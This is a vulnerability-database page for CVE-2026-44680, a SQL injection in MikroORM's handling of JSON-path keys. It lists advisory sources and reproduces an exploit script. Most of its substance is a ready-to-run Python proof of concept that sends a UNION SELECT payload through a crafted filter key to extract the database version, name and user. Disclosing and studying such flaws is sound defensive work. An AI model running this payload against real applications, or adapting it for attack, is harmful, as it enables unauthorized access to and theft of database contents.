| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2026-44680 | 26 May 202616:49 | β | attackerkb | |
| MikroORM SQL注ε ₯ζΌζ΄ | 26 May 202600:00 | β | cnnvd | |
| CVE-2026-44680 | 26 May 202616:49 | β | cve | |
| CVE-2026-44680 MikroORM: SQL injection via runtime-controlled identifiers and JSON-path keys | 26 May 202616:49 | β | cvelist | |
| MikroORM 7.0.13 - SQL Injection | 29 May 202600:00 | β | exploitdb | |
| EUVD-2026-31893 | 26 May 202616:49 | β | euvd | |
| MikroORM has SQL injection via runtime-controlled identifiers and JSON-path keys | 8 May 202619:17 | β | github | |
| CVE-2026-44680 | 26 May 202617:16 | β | nvd | |
| CVE-2026-44680 MikroORM: SQL injection via runtime-controlled identifiers and JSON-path keys | 26 May 202616:49 | β | osv | |
| GHSA-CFW5-68C4-FFQP MikroORM has SQL injection via runtime-controlled identifiers and JSON-path keys | 8 May 202619:17 | β | osv |
# Exploit Title: MikroORM 7.0.13 - SQL Injection
# Google Dork: N/A
# Date: 2026-05-27
# Exploit Author: cardosource
# Vendor Homepage: https://mikro-orm.io/
# Software Link: https://github.com/mikro-orm/mikro-orm
# Version: @mikro-orm/knex <= 6.6.13 / @mikro-orm/sql <= 7.0.13
# Tested on: Docker / Debian Bookworm / Node.js 18 / MariaDB 10.x
# CVE: CVE-2026-44680
# Advisory: https://github.com/mikro-orm/mikro-orm/security/advisories/GHSA-cfw5-68c4-ffqp
"""
Description:
The vulnerability exists because MikroORM fails to properly escape
runtime-controlled JSON path keys when building JSON_EXTRACT queries.
The attacker can break out of the JSON path context and inject arbitrary SQL.
Affected API pattern:
em.find(Entity, {
jsonColumn: {
[userControlledKey]: value
}
})
By injecting crafted JSON-path keys, it becomes possible to execute
UNION SELECT statements and extract arbitrary database information.
"""
import requests
import json
url = "http://localhost:3000/api/users/search"
payload = {
"filterField": "$.x' ) OR 1=1 UNION SELECT @@version, DATABASE(), USER(), @@version_comment -- ",
"filterValue": "x"
}
headers = {
"Content-Type": "application/json"
}
response = requests.post(url, json=payload, headers=headers)
print(f"Status: {response.status_code}")
print(json.dumps(response.json(), indent=2))Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation